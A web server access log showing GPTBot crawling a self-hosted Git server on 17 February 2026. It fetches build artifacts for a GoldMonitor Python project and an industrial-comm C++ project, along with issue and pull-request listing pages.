"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38605] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70853] [Gzip 17.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72048] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70858] [Gzip 17.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16405] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38605] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38636] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71930] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71925] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38632] [Gzip 14.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" +[17/Feb/2026:18:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10101] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11879] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.48] [Sent-to 192.168.0.250] 